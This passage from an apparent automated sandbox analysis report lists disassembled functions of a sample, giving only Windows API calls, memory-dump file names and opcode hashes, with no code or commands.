                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                  • Opcode ID: 2061eb9caa138d6c561b43ccf5176d5fc43e843db181cd3aeef6c8d21db1b5bf
                                                                                                                                                                                                                                                                  • Instruction ID: cbb20e115e5386dad913aa79acf11c7ef91fb6cd9aba4a19dc350d4101aa6770
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2061eb9caa138d6c561b43ccf5176d5fc43e843db181cd3aeef6c8d21db1b5bf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FD0A9313813106BE224A730AC0BFC63A209F01B00F200828B209EA2D0D8E068408678
                                                                                                                                                                                                                                                                  Function 00D72DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D72DC8
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00D72DDB
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4F292: Sleep.KERNEL32 ref: 00D4F30A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                  • Opcode ID: 82eb3a0c437cc69b6dd2fbb4d2b6f75704e12c69c1503ce165b4c1535e8881df
                                                                                                                                                                                                                                                                  • Instruction ID: 58ce258e3fab319d394a02ac31ca53956a11bd308890a948ce23ca399faa5a15
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82eb3a0c437cc69b6dd2fbb4d2b6f75704e12c69c1503ce165b4c1535e8881df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FD0C935395314ABE664A770AC4BFD67A659F51B10F204829B249EA2D0D9E468408674
                                                                                                                                                                                                                                                                  Function 00D1C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00D1C213
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D1C221
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D1C27C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                  • Opcode ID: 719109cdae4c436053df60611d101509b8e7d5d91a4d1bdbcd959778a3b85bd6
                                                                                                                                                                                                                                                                  • Instruction ID: 2e4d4bc42c2f99db86f88ddab0a2855c89d4c673cc7c8a284103e324e36537b4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 719109cdae4c436053df60611d101509b8e7d5d91a4d1bdbcd959778a3b85bd6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D641E530690215BFDB218FE4E844BFA7BA5EF11320F285169F8599B2A1EF308C80C775